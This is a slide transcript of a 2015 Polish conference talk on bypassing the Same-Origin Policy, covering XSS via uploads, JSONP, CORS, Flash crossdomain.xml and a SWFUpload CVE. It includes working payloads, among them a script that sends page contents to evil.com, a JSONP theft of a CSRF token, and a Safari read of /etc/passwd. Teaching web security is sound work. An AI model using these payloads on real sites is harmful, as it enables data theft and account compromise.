4Developers 2015: Bypassing Same-Origin Policy - Jakub Żoczek
Transcript of 4Developers 2015: Bypassing Same-Origin Policy - Jakub Żoczek
Bypassing Same-Origin Policy
Jakub Żoczek
http://twitter.com/zoczus
Bypassing Same-Origin Policy
$ whoami
• Jakub Żoczek
• Specjalista ds. Bezpieczeństwa Systemów IT
• Security Researcher
• Bug Hunter
• http://zoczus.blogspot.com
• Hall of Fame:
Bypassing Same-Origin Policy
Czym jest Same-Origin Policy?
•Ta sama domena
•Ten sam port
•Ten sam schemat
Bypassing Same-Origin Policy
Czym jest Same-Origin Policy?
Bypassing Same-Origin Policy
Dla strony http://example.com
URL Komentarz
http://example.com/admin/index.php
http://example.com/images/logo.png
https://example.com/admin/panel Inny schemat
http://example.com:8080/example.html Inny port
http://admin.example.com/index.php Inna domena
Czym jest Same-Origin Policy?
Bypassing Same-Origin Policy
• Zwrotka AJAX
• Zawartość iframe
(document / window)
• <script> content
• <img> content
Czym jest Same-Origin Policy?
Bypassing Same-Origin Policy
• <img src="(…)">
• <script src="(…)">
• <link href="(…)">
Cross-Site Scripting
Bypassing Same-Origin Policy
<?php
echo '<h1> Wyniki wyszukiwania dla: ' .
$_GET['search'] . '</h1>'
// (...)
?>
Cross-Site Scripting
Bypassing Same-Origin Policy
<html>
<body>
<!-- (...) -->
<script>
x=new XMLHttpRequest();
x.open("POST","http://evil.com/log_data", true);
x.send(btoa(document.body.innerHTML));
</script>
Cross-Site Scripting – uplaod plików
Bypassing Same-Origin Policy
html / htm / shtml
<html>
<body>
<script>alert('XSS');</script>
</body>
</html>
Cross-Site Scripting – uplaod plików
Bypassing Same-Origin Policy
xml/xsd/xsl/xhtml/rdf/svg/svgz <?xml version="1.0" standalone="no" ?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN"
"http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400" />
<script type="text/javascript">
alert('XSS');
</script>
</svg>
Cross-Site Scripting – uplaod plików
Bypassing Same-Origin Policy
swf / swfl package {
import flash.display.Sprite;
public class xss extends Sprite {
public function xss() {
super();
ExternalInterface.call("alert('XSS')");
return;
}
}
}
HTML Injection
Bypassing Same-Origin Policy
<?php
header("Content-Security-Policy: script-src 'self'; object-src
'self'; style-src 'self'");
header("Content-type: text/html; charset=utf-8");
$token = "2b9ee1db6d3989f5eec70e59ab211619";
echo "<br>XSS-free Content Here " . $str;
echo "<br>Your token: " . $token;
echo "<script>var x = 'test';</script>”;
echo "</body></html>"
?>
HTML Injection
Bypassing Same-Origin Policy
root@ropchain:/var/log/apache2# cat access.log| grep token
213.17.226.11 - - [15/Apr/2015:16:51:57 +0200] "GET
/%3Cbr%3EYour%20token:%202b9ee1db6d3989f5eec70e59ab21161
9%3Cscript%3Evar%20x%20= HTTP/1.0" 404 553
"http://lab.ropchain.org/tmp/u.php?str=%3Cimg%20src=%27http://ropchai
n.org/" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:36.0) Gecko/20100101
Firefox/36.0"
JSON
Bypassing Same-Origin Policy
http://hostname/whoami
{
"logged_in":true,
"login":"victim",
"csrf":"46aa3b5901c2b41c90ad5de62ee1b2ba"
}
JSON
Bypassing Same-Origin Policy
http://evil.com
<script src="http://hostname/whoami"></script>
JSONP
Bypassing Same-Origin Policy
http://hostname/whoami?callback=xx
xx({
"logged_in":true,
"login":"victim",
"csrf":"46aa3b5901c2b41c90ad5de62ee1b2ba"
});
JSONP
Bypassing Same-Origin Policy
http://evil.com
<script>xx=function(x){alert(x.csrf);}</script>
<script src="http://hostname/whoami?callback=xx"></script>
Access-Control-Allow-Origin
Bypassing Same-Origin Policy
HTTP/1.0 200 OK
Date: Thu, 16 Apr 2015 08:50:19 GMT
Server: Apache/2.2.22 (Debian)
Last-Modified: Mon, 16 Dec 2013 09:18:36 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Access-Control-Allow-Origin: http://lab.ropchain.org
Content-Encoding: gzip
Content-Length: 1509
Content-Type: text/html; charset=utf-8
Access-Control-Allow-Origin
Bypassing Same-Origin Policy
HTTP/1.0 200 OK
Date: Thu, 16 Apr 2015 08:50:19 GMT
Server: Apache/2.2.22 (Debian)
Last-Modified: Mon, 16 Dec 2013 09:18:36 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Access-Control-Allow-Origin: *
Content-Encoding: gzip
Content-Length: 1509
Content-Type: text/html; charset=utf-8
Bypassing Same-Origin Policy
<iframe src=http://wp.pl/
onload="alert(frames[0].document.cookie)">
</iframe>
Safari
Bypassing Same-Origin Policy
<script>
var x = new XMLHttpRequest();
x.onreadystatechange() {
document.body.innerText = x.response;
}
x.open("GET","file:///etc/passwd", true);
x.send();
</script>
Safari
Flash – crossdomain.xml
Bypassing Same-Origin Policy
http://domain.com/crossdomain.xml
<?xml version="1.0" encoding="UTF-8"?>
<cross-domain-policy>
<allow-access-from domain="*.domain.com" secure="false"/>
</cross-domain-policy>
Flash – crossdomain.xml
Bypassing Same-Origin Policy
http://domain.com/crossdomain.xml
<?xml version="1.0" encoding="UTF-8"?>
<cross-domain-policy>
<allow-access-from domain="*" secure="false"/>
</cross-domain-policy>
Flash – crossdomain.xml
Bypassing Same-Origin Policy
http://domain.com/crossdomain.xml
<?xml version="1.0" encoding="UTF-8"?>
<cross-domain-policy>
<allow-access-from domain="*.domain.com" secure="false"/>
</cross-domain-policy>
http://etsy.com - demo
Bypassing Same-Origin Policy
https://www.youtube.com/watch?v=yuOiDqpxKow
Flash – Security.allowDomain("*")
Bypassing Same-Origin Policy
SWFUpload - CVE-2013-2205 (© Szymon Gruszecki)
• Security.allowDomain("*")
• Kontrolujemy adres URL do uploadu
• Kontrolujemy callback do zwrotki o statusie uploadu
• W callbacku otrzymujemy content dokumentu
• …
• PROFIT!
Flash – Security.allowDomain("*")
Bypassing Same-Origin Policy
SWFUpload - CVE-2013-2205 (© Szymon Gruszecki)
private function UploadSuccess(file: FileItem, serverData:
String, responseReceived: Boolean = true): void {
// (…)
ExternalCall.UploadSuccess(this.uploadSuccess_Callback,
file.ToJavaScriptObject(), serverData, responseReceived);
this.UploadComplete(false);
}
Flash – Security.allowDomain("*")
Bypassing Same-Origin Policy
www.paypal.com/crossdomain.xml:
advertising.paypal.com/(...)/swfupload.swf - PODATNY
:-)
<?xml version="1.0"?>
<!-- (...) -->
<cross-domain-policy>
<allow-access-from domain="*.paypal.com" />
<allow-access-from domain="*.paypalobjects.com" />
</cross-domain-policy>
http://paypal.com - demo
Bypassing Same-Origin Policy
https://www.youtube.com/watch?v=-3Qgwi9rAfY
Bypassing Same-Origin Policy
public function cleanEIString(arg1: String): String {
return arg1.replace(new RegExp("[^A-Za-z0-9_.]", "gi"), "");
}
// (…)
if (loaderInfo.parameters.readyFunction != undefined) {
ExternalInterface.call(
_app.model.cleanEIString(readyFunction),
ExternalInterface.objectID
);
}
http://yammer.com - demo
Bypassing Same-Origin Policy
https://www.youtube.com/watch?v=J0f_sKpUak0
Pytania?
Jakub Żoczek ([email protected])
http://zoczus.blogspot.com
http://twitter.com/
Bypassing Same-Origin Policy